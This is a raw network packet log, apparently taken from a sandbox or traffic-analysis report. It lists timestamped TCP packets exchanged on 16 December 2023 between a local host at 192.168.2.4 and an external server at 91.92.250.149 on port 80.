                                                                                        Dec 16, 2023 18:16:57.196111917 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.196149111 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.196181059 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.196214914 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.196223974 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.196248055 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.196269035 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.196305037 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.196331024 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.196366072 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.196383953 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.196396112 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.196420908 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.196434975 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.196469069 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.196507931 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.196528912 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.196566105 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.196588993 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.196626902 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.196746111 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.196784973 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.196790934 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.196819067 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.196820974 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.196856976 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.196877956 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.196914911 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.196930885 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.196968079 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.196979046 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.197010040 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.197042942 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.197088003 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.197108984 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.197144985 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.197176933 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.197216034 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.197218895 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.197256088 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.197266102 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.197302103 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.197319984 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.197356939 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.197379112 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.197415113 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.197556019 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.197585106 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.197598934 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.197617054 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.197632074 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.197668076 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.197693110 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.197712898 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.197727919 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.197741985 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.197797060 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.197835922 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.197859049 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.197896957 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.197896957 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.197917938 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.197935104 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.197947979 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.197999001 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.198012114 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.198038101 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.198050022 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.198101997 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.198139906 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.198156118 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.198191881 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.198204041 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.198242903 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.198257923 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.198268890 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.198302031 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.198333979 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.198370934 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.198436022 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.198477983 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.198502064 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.198538065 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.198551893 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.198585987 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.198591948 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.198631048 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.198647976 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.198684931 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.198707104 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.198741913 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.198776007 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.198795080 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.198816061 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.198832035 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.198923111 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.198967934 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.198988914 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199002028 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199012041 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199023962 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199027061 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.199048042 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199048996 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.199069977 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.199084997 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.199095011 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199105978 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199116945 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199130058 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.199157000 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.199172974 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199184895 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199209929 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.199256897 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199286938 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199295044 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.199316978 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.199327946 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199362993 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.199369907 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199405909 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.199417114 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199428082 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199455976 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.199476004 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199512959 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.199522972 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199548960 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199558973 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.199580908 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.199596882 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199618101 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199635029 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.199656010 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.199680090 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199702024 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199717999 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.199740887 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.199795961 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.199831963 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.436115980 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.436233997 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.436240911 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.436247110 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.436279058 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.436296940 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.436306953 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.436331987 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.436367035 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.436402082 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.436456919 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.436486959 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.436558962 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.436602116 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.436635017 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.436669111 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.436778069 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.436816931 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.436841011 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.436877012 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.436913013 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.436952114 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.436954021 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.436985970 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.437119007 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.437160969 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.437244892 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.437284946 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.437306881 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.437340021 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.437372923 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.437410116 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.437443018 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.437479019 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.437500000 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.437536955 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.437616110 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.437657118 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.437696934 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.437732935 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.437947035 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.437988043 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.438047886 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.438060999 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.438091993 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.438158035 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.438196898 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.438208103 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.438240051 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.438267946 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.438298941 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.438302994 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.438334942 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.438359976 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.438393116 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.438544035 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.438591957 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.438625097 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.438662052 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.438662052 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.438699007 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.438731909 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.438766003 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.438828945 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.438864946 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.438886881 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.438920975 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.438941002 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.438973904 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.438996077 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.439029932 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.439063072 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.439097881 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.439120054 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.439157009 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.439246893 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.439282894 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.439315081 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.439349890 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.439371109 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.439404964 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.439455032 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.439486980 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.439554930 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.439588070 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.439743996 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.439784050 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.439806938 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.439846992 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.439860106 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.439899921 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.439958096 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.440078974 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.440107107 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.440107107 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.440171957 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.440212011 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.440248013 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.440287113 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.440320969 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.440357924 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.440381050 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.440413952 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.440438032 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.440475941 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.440510035 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.440543890 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.440583944 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.440620899 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.440778971 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.440825939 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.440912962 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.440956116 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.441004992 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.441041946 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.441066027 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.441099882 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.441159964 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.441209078 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.441241980 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.441282034 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.441318989 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.441360950 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.441431046 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.441462040 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.441509008 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.441540956 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.441601992 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.441643953 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.441663027 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.441698074 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.441714048 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.441747904 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.441812038 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.441848040 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.441962957 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.441996098 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.442051888 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.442086935 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.442332029 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.442368031 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.442399979 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.442434072 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.442495108 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.442527056 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.442560911 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.442599058 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.442770004 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.442805052 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.442856073 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.442889929 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.442951918 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.442987919 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.443047047 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.443079948 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.443135977 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.443190098 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.443228006 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.443254948 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.443269968 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.443269968 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.443315029 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.443326950 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.443352938 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.443417072 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.443439960 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.443475008 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.443579912 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.443612099 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.443681955 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.443722010 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.443759918 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.443789005 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.443849087 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.443881989 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.443907022 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.443945885 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.443979979 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.444015026 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.444047928 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.444084883 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.444099903 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.444135904 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.444354057 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.444389105 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.444433928 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.444469929 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.444505930 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.444540024 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.444557905 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.444591045 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.444613934 CET804972991.92.250.149192.168.2.4
